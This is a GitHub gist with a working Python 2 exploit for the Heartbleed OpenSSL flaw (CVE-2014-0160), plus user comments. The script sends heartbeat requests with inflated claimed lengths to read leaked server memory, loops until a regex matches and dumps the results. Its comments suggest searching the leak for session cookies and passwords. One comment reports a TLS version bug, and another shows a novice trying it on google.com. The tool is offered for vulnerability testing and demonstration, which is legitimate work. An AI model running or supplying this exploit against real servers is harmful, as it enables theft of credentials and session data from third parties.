Testing tool for analysis of Heartbleed vulnerability (CVE-2014-0160).
#!/usr/bin/env python2 | |
# Heart-shaped tool | |
# ================= | |
# Testing tool in demonstration of CVE-2014-0160. | |
# Heavily derived from code by Jared Stafford (jspenguin@jspenguin.org). | |
# This version by: @zenoamaro, <zenoamaro at gmail dot com> | |
# Hits the Heartbleed vulnerability on a hostname. | |
# | |
# In a heartbeat request, if the claimed payload length is | |
# larger than the actual length, this will trick a vulnerable | |
# server into replying with more data than actually sent, as has | |
# been described in [CVE-2014-0160] as _[heartbleed]_. | |
# | |
# [heartbleed]: http://heartbleed.com/ | |
# [CVE-2014-160]: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160 | |
# | |
# Play with `payload length` to influence where on the heap you | |
# want your payload to be allocated, and use `claimed length` to | |
# decide how much data you are trying to receive. | |
# | |
# `/` chars will be used as payload content, so if the server is | |
# vulnerable, and the payload long enough, you will see them | |
# back in the memory you receive. | |
# | |
# You can also grep for regex patterns to try to calculate the | |
# actual risk of having certain data leaked by your service. | |
# A common use would be searching for a cookie like `session=\w+;`, | |
# `PHPSESSID=\w+;`, or form data like `[?&]password[^&]*`, and so on. | |
# | |
import re | |
import sys | |
import struct | |
import socket | |
import time | |
import select | |
from datetime import datetime | |
from optparse import OptionParser | |
# Keep some global settings for simplicity. | |
class Settings: | |
debug = False | |
dump_file = None | |
options = OptionParser( | |
usage='%prog server[:port] [options]', | |
description='Hitter for SSL heartbeat vulnerability (CVE-2014-0160)') | |
options.add_option('-r', '--rev', type='int', default=2, help='TLS revision, 1.x (default: 2)') | |
options.add_option('-p', '--payload', type='int', default=1, help='Actual payload length (default: 1)') | |
options.add_option('-l', '--length', type='int', default=4096, help='Claimed payload length (default: 4096)') | |
options.add_option('-w', '--wait', type='int', default=False, help='Wait given ms after every request') | |
options.add_option('-g', '--grep', type='str', default=False, help='Keep searching for regex pattern') | |
options.add_option('-f', '--file', type='str', default=False, help='Append all received responses to file') | |
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') | |
FILE_DUMP_TEMPLATE = ''' | |
<---response-[{datetime}]-[{response_length}b]---: | |
{response} | |
:---> | |
''' | |
# Utils | |
# ----- | |
def clamp(min_value, value, max_value): | |
""" Fixes a value between two bounds, inclusive. """ | |
return min(max(min_value, value), max_value) | |
def log(msg): | |
sys.stderr.write("{}\n".format(msg)) | |
sys.stderr.flush() | |
def debug(msg): | |
if Settings.debug: | |
log(msg) | |
def dump_to_file(msg): | |
if Settings.dump_file: | |
with open(Settings.dump_file, 'a+') as f: | |
f.write(FILE_DUMP_TEMPLATE.format( | |
response=msg, | |
response_length=len(msg), | |
datetime=datetime.now(), | |
)) | |
def printable(c): | |
""" Masks non-printable characters to `.` """ | |
return c if 32 <= ord(c) <= 126 else '.' | |
def hex2bin(s): | |
""" Parses an ASCII hex table into a bytestring """ | |
return re.sub(r'\s', '', s)\ | |
.decode('hex') | |
def bin2hex(s): | |
""" Transforms a bytestring into an ASCII hex table of width 16 """ | |
def produce_line(offset): | |
line = s[ offset : offset+16 ] | |
hex_data = ' '.join( '{:02X}'.format(ord(c)) for c in line ) | |
str_data = ''.join( map(printable, line) ) | |
return '{:04x}: {:<48s} {:s}'.format(offset, hex_data, str_data) | |
return '\n'.join( produce_line(offset) for offset in xrange(0, len(s), 16) ) | |
def bin2str(s): | |
""" Prints the bytestring masking non-printable chars """ | |
return''.join( map(printable, s) ) | |
# Payloads | |
# -------- | |
# TLS Heartbeat Hello | |
# https://tools.ietf.org/html/rfc6520#section-2 | |
HELLO = ''' | |
16 03 {tls_revision:02X} 00 dc 01 00 00 d8 03 02 53 | |
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf | |
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 | |
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 | |
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c | |
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 | |
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 | |
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c | |
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 | |
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 | |
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 | |
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 | |
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 | |
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 | |
00 0f 00 01 01 ''' | |
# TLS Heartbeat Request | |
# https://tools.ietf.org/html/rfc6520#section-4 | |
# u8 u8 u8, u16: record type, major, minor, record length | |
# u8 u16 u8...: request type, payload length, payload... | |
HEARTBEAT = ''' | |
18 03 {tls_revision:02X} {payload_length:04X} | |
01 {claimed_length:04X} {payload} | |
''' | |
def produce_hello(tls_revision): | |
tls_revision = clamp(0, tls_revision, 2) | |
return hex2bin(HELLO.format( | |
tls_revision=tls_revision | |
)) | |
def produce_heartbeat(payload_length, claimed_length, tls_revision): | |
""" | |
Will produce a heartbeat message, whose actual payload | |
content is `payload_length` bytes long, with a claimed | |
length of `claimed_length` bytes. | |
If the claimed length is larger than the actual payload | |
length, this will trick a vulnerable server into replying | |
with more data than actually sent, as has been described in | |
[CVE-2014-0160] as _[heartbleed]_. | |
[heartbleed]: http://heartbleed.com/ | |
[CVE-2014-160]: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160 | |
""" | |
overhead = 3 # Account for necessary data | |
payload_length = clamp(1, payload_length, 0x4000 - overhead) | |
claimed_length = clamp(1, claimed_length, 0xFFFF) | |
tls_revision = clamp(0, tls_revision, 2) | |
payload = '2f' * payload_length # `/` character | |
message = hex2bin(HEARTBEAT.format( | |
tls_revision = tls_revision, | |
payload_length = payload_length + overhead, | |
claimed_length = claimed_length, | |
payload = payload, | |
)) | |
if Settings.debug: | |
debug('Produced this Heartbeat request:') | |
debug(bin2hex(message)) | |
return message | |
# Socket communication | |
# -------------------- | |
def connect(host, port=443): | |
debug('Connecting to {}:{}...'.format(host, port)) | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
sock.connect((host, port)) | |
return sock | |
def recv_all(sock, length, timeout=5): | |
""" Receive remaining data from the socket, until timeout. """ | |
response = '' # Final response | |
bytes_left = length # Remaning bytes to read | |
end_time = time.time() + timeout # Stop at this time | |
while bytes_left > 0: | |
rtime = end_time - time.time() | |
if rtime < 0: # Timeout | |
return None | |
r, w, e = select.select([sock], [], [], 5) | |
if sock in r: | |
data = sock.recv(bytes_left) | |
if not data: # EOF? | |
return None | |
response += data | |
bytes_left -= len(data) | |
return response | |
def recv_msg(sock, forced_length=None): | |
""" Receive a whole message, optionally ignoring the response's | |
embedded length. """ | |
header = recv_all(sock, 5) # Header is 5 bytes | |
if header is None: | |
raise RuntimeError('Server closed connection while receiving record header.') | |
typ, ver, length = struct.unpack('>BHH', header) | |
# Here we can bypass the server's response, which is | |
# often accurately "capped" at 16384 bytes as per spec. | |
# We usually won't receive more than 65k here. | |
pay = recv_all(sock, forced_length or length, timeout=10) | |
if pay is None: | |
raise RuntimeError('Server closed connection while receiving record payload.') | |
debug('... received message: type={:d}, ver={:04x}, length={:d}'.format(typ, ver, len(pay))) | |
return typ, ver, pay | |
# TSL and Heartbeat | |
# ----------------- | |
def send_hello(sock, tls_revision=None): | |
""" Sends HELLO and waits for response. """ | |
debug('Sending HELLO...') | |
sock.send(produce_hello(tls_revision)) | |
debug('... waiting for response...') | |
while True: | |
typ, ver, response = recv_msg(sock) | |
if typ == None: | |
raise RuntimeError('Server closed connection without replying to Hello.') | |
# Look for server HELLO done message. | |
if typ == 22 and ord(response[0]) == 0x0E: | |
break | |
def send_heartbeat(sock, payload_length=None, claimed_length=None, | |
tls_revision=None): | |
""" Sends a Heartbeat requests produced to given | |
specifications, and waits for response. | |
Returns a `(is_vulnerable, response)` pair.""" | |
heartbeat = produce_heartbeat( | |
payload_length, claimed_length, tls_revision) | |
debug('Sending HEARTBEAT request...') | |
sock.send(heartbeat) | |
debug('... waiting for response...') | |
while True: | |
typ, ver, response = recv_msg(sock, claimed_length) | |
# No response | |
if typ is None: | |
debug('... no response received.') | |
return (False, None) | |
# Error response | |
elif typ == 21: | |
debug('... server returned error.') | |
return (False, response) | |
# Heartbeat response | |
elif typ == 24: | |
if len(response) > payload_length +2: | |
debug('... response contains more data than it should.') | |
return (True, response) | |
else: | |
debug('... server complied, but did not return any extra data.') | |
return (False, response) | |
# Keep waiting... | |
# Prog | |
# ---- | |
def parse_host(s): | |
""" Parses a `host:port` string into a tuple. """ | |
server = s.split(':') | |
host = server[0] | |
try: | |
port = int(server[1]) | |
except IndexError: | |
port = 443 | |
return (host, port) | |
def execute(host, port, tls_revision=None, | |
payload_length=None, claimed_length=None): | |
""" Sends a Heartbeat request to a given host. """ | |
sock = connect(host, port) | |
send_hello(sock, tls_revision) | |
is_vuln, response = send_heartbeat( | |
sock, payload_length, claimed_length, tls_revision) | |
if response: | |
dump_to_file(response) # Always dump all payloads to file | |
return (is_vuln, response) | |
# Command line tool | |
# ----------------- | |
if __name__ == '__main__': | |
opts, args = options.parse_args() | |
if len(args) < 1: | |
options.print_help() | |
sys.exit(-1) | |
Settings.debug = opts.debug | |
Settings.dump_file = opts.file | |
grep_pattern = re.compile(opts.grep) if opts.grep else False | |
wait_time = (opts.wait / 1000.0) if opts.wait else False | |
try: | |
host, port = parse_host(args[0]) | |
except ValueError: | |
print 'Bad port value: {}.'.format(server[1]) | |
sys.exit(-1) | |
matches = None | |
requests = 0 | |
while True: | |
try: | |
is_vuln, response = execute( | |
host, port, | |
tls_revision=opts.rev, | |
payload_length=opts.payload, | |
claimed_length=opts.length) | |
except Exception as e: | |
log("{}".format(e.message)) | |
# Our journey ends here. | |
sys.exit(-1) | |
else: | |
requests += 1 | |
if requests % 50 == 0: | |
log("{} requests...".format(requests)) | |
# We are satisfied, break early | |
if not is_vuln or not grep_pattern: | |
matches = None | |
break | |
# We are seeking for certain leaked data | |
matches = grep_pattern.findall(response) | |
if matches: | |
break | |
# Sleep for some ms before trying again | |
if wait_time: | |
debug('Waiting {}ms...'.format(int(wait_time * 1000))) | |
time.sleep(wait_time) | |
if is_vuln and response: | |
log('Server is vulnerable: it returned more data than it should have!') | |
if matches: | |
log('Server also leaked the prospected data after {} requests:'.format(requests)) | |
log( '\n'.join( '- {}'.format(match) for match in matches ) ) | |
# Dump the response | |
debug('Here is the full response:') | |
debug(bin2hex(response)) | |
else: | |
log('Server appears not to be vulnerable.') |
This comment has been minimized.
This comment has been minimized.
There's a small bug in your implementation: your tls revision number is not correct, takeshixx / hb-test.py (https://gist.github.com/takeshixx/10107280) shows it as: tls_versions = {0x01:'TLSv1.0',0x02:'TLSv1.1',0x03:'TLSv1.2'} while you simply pass in 0x00 for TLSv1.0 and so on. Interestingly 0x03 does not work though, gives me a TLS protocol alert, so I'll stick with v1.1, thanks for the script. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Hi there, i never use python before. I opened your .py with IDLE and F5 to run it.
But i can't test the program. what should i type to test it?
i tried a lot of format and it keep giving me wrong syntax.
I tried:
hst.py www.google.com
hst.py http://www.google.com
hst.py 141.8.224.25
hst.py http://141.8.224.25